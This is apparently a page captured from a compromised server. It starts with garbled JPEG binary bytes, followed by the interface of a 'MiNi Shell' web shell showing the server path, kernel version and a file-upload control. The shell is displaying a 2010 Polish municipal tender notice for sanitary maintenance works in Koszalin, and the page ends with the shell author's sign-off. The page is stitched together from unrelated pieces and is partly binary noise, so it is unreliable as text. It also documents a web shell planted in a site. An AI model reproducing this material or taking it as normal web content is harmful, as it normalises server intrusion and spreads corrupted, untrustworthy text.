JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100125/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100125/21474-N-2010.html

<p class="kh_header"><b>Koszalin: Wykonywanie w lokalach i częściach wspólnych, na terenach zewnętrznych, nieruchomości zarządzanych przez zamawiającego robót w branży sanitarnej.</b><br>
<b>Numer ogłoszenia: 21474 - 2010; data zamieszczenia: 25.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Koszalin Zarząd Budynków Mieszkalnych , ul. Połczyńska 24, 75-815 Koszalin, woj. zachodniopomorskie, tel. 094 3409106, 3409107, faks 094 3409196.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://zbm.koszalin.ibip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonywanie w lokalach i częściach wspólnych, na terenach zewnętrznych, nieruchomości zarządzanych przez zamawiającego robót w branży sanitarnej..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wykonywanie w lokalach i częściach wspólnych, na terenach zewnętrznych, nieruchomości zarządzanych przez zamawiającego robót w branży sanitarnej w zakresie instalacji: wewnętrznej i zewnętrznej wodno-kanalizacyjnej i gazowej, w tym:
1)	roboty konserwacyjne, niestanowiące robót budowlanych w świetle ustawy z dnia 7 lipca 1994r. Prawo budowlane (tekst jednolity: Dz. U. Z 2006r. nr 156, poz. 1118 z póź. zm.);
2)	reprezentowanie zamawiającego w czynnościach odczytów wodomierzy głównych przez MWiK Koszalin sp. z o.o. z jednoczesnym przeprowadzeniem kontroli szczelności połączeń wodomierzy z instalacją oraz szczelności dławic na zaworach odcinających.*.
3)	awaryjne roboty remontowe.
* Wg stanu na 31.12. 2009r. w zasobach zamawiającego znajduje się 30 szt. wodomierzy podlegających comiesięcznym odczytom. 
Wykaz  wodomierzy podlegającym odczytom będzie na bieżąco przekazywał wykonawcy zamawiający
Maksymalna wartość wynagrodzenia, którą wykonawca może uzyskać w okresie realizacji umowy to  225,000,00 zł netto bez VAT; 240.750,00 zł brutto z VAT. 
Maksymalne wynagrodzenie netto jest stałe do końca trwania umowy i nie podlega zmianie w trakcie obowiązywania umowy. Wynagrodzenie brutto może ulec zmianie w przypadku wykonywania usług/robót  w budynkach lub lokalach użytkowych a także w przypadku wykonywania   odczytów wodomierzy. 
Zakres rzeczowy robót,  oraz termin ich wykonania będzie określać każdorazowo zlecenie zamawiającego
Całkowita wartość wynagrodzenia może zostać zmniejszona z przyczyn wynikających z potrzeb zamawiającego, w szczególności ze zmniejszającego się w trakcie realizacji zasobu mieszkaniowego Gminy Miasto Koszalin.
 Miejsce realizacji zamówienia:  Koszalin (budynki komunalne)..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.33.00.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Każdy wykonawca zobowiązany jest wnieść przed upływem terminu składania ofert, wadium w wysokości 2.000,00 PLN.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki  określone w art. 22 ust. 1 ustawy Pzp .
W przypadku oferty wspólnej, ww. warunki  wykonawcy muszą spełniać łącznie.
2. Wykonawca musi wykazać się doświadczeniem zawodowym, polegającym na wykonaniu (a w przypadku świadczeń okresowych lub ciągłych również wykonywanych) w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie , co najmniej jednej umowy (jednego kontraktu), obejmującej  wykonywanie usług/ robót konserwacyjnych lub remontowych lub konserwacyjno - remontowych w branży sanitarnej.
Wartość wykonanych usług/robót w ramach zawartej umowy (kontraktu) nie może być mniejsza niż 200.000,00 zł brutto (z VAT).
Warunek zostanie uznany przez zamawiającego za spełniony, jeżeli wykonawcy składający ofertę wspólną będą spełniać go łącznie.
3. Zamawiający oceni spełnienie warunków udziału w postępowaniu na podstawie analizy treści żądanych oświadczeń, wykazów i dokumentów wymienionych w rozdziale X i XI siwz, potwierdzających spełnienie warunków i brak podstaw do wykluczenia.
Ocena  dokonana zostanie zgodnie z formułą spełnia - nie spełnia,  w oparciu o informacje zawarte w oświadczeniach i dokumentach złożonych przez wykonawcę do niniejszego postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykaz oświadczeń i dokumentów, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełnienia warunków  udziału w postępowaniu:
1.  oświadczenie wykonawcy , że spełnia warunki określone w art. 22 ust. 1 ustawy Prawa zamówień   publicznych, wg wzoru stanowiącego załącznik nr 2 siwz.
W przypadku składania oferty  wspólnej ww. oświadczenie podpisuje pełnomocnik ustanowiony zgodnie z art. 23 ust. 2 ustawy Pzp lub wszyscy wykonawcy.
2. wykaz wykonanej(ych), a w przypadku świadczeń okresowych lub ciągłych również wykonywanej(ych)  usług/robót  konserwacyjnych lub  remontowych lub konserwacyjno-remontowych potwierdzający spełnienie warunku, o których mowa w rozdziale IX pkt  2 siwz z podaniem ich wartości, przedmiotu, dat wykonania, nazwy i adresu odbiorcy, wraz   z dokumentami (np. referencjami)  potwierdzającymi , że usługi/roboty zostały wykonane należycie  lub są wykonywane należycie, wg wzoru stanowiącego załącznik nr 3 siwz.
W przypadku podmiotów występujących wspólnie dokument ten (wykaz) składają ci z wykonawców, którzy potwierdzają spełnienie warunku a dokumenty potwierdzające należyte wykonanie składają ci z wykonawców, którzy potwierdzali spełnienie warunku).  W przypadku składania oferty wspólnej wykaz składa każdy  z wykonawców składających ofertę wspólną lub jeden wspólny wykaz  (dokumenty potwierdzające należyte wykonanie składają ci z wykonawców, którzy potwierdzali spełnienie warunku).

3. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków . Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia , w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów od oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.

W postępowaniu mogą wziąć udział wykonawcy, którzy nie podlegają wykluczeniu na podstawie art. 24 ust. 1 ustawy Pzp i na potwierdzenie braku podstaw do wykluczenia z powodu niespełnienia warunków, o których mowa w art. 24 ust. 1 ustawy Pzp zamawiający żąda załączenia do oferty następujących dokumentów:
1. oświadczenie wykonawcy o  braku podstaw do  wykluczenia z postępowania o udzielenie zamówienia publicznego z powody niespełnienia warunków, o których mowa w art. 24 ust. 1 ustawy Pz wg wzoru stanowiącego załącznik nr 4 siwz;
W przypadku składania oferty wspólnej ww. oświadczenie składa każdy  z wykonawców składających ofertę wspólną.
2. aktualny odpis z właściwego rejestru albo zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
W przypadku składania oferty wspólnej ww. dokument składa każdy z wykonawców składających ofertę wspólną. 
Pozostałe dokumenty, które wykonawca jest zobowiązany  dołączyć do oferty:
a) ofertę cenową  - zał. nr 1 
W przypadku składania oferty wspólnej należy złożyć jeden dokument.
b) pełnomocnictwo w przypadku gdy wykonawcę reprezentuje pełnomocnik do oferty musi być dołączone pełnomocnictwo określające jego zakres i podpisane przez osoby uprawnione do reprezentacji wykonawcy.
Pełnomocnictwo musi być dołączone do oferty w formie oryginału albo kopii poświadczonej przez notariusza za zgodność z oryginałem.
W przypadku składania oferty wspólnej należy złożyć jeden dokument.
c)  W przypadku wykonywania zamówienia przy udziale podwykonawców do oferty należy dołączyć wykaz części zamówienia, których wykonanie wykonawca powierzy podwykonawcom  wg wzoru stanowiącego zał. nr 5  siwz.
W przypadku składania oferty wspólnej należy złożyć jeden dokument (wykaz).
Wykonawca na żądanie zamawiającego i w zakresie przez niego wskazanym jest zobowiązany wykazać odpowiednio, nie później niż na dzień składania ofert, spełnienie warunków, o których mowa w art. 22 ust. 1 ustawy Pzp, i brak podstaw do wykluczenia.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://zb,koszalin.ibip.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Budynków Mieszkanych 75-815 Koszalin, ul. Połczyńska 24, pokój 212 lub za zaliczeniem pocztowym. Koszt siwz (w formie papierowej)18,20PLN.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.02.2010 godzina 09:55, miejsce: Zarząd Budynków Mieszkalnych 75-815 Koszalin, ul. Połczyńska 24, pokój 212 (sekretariat)..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com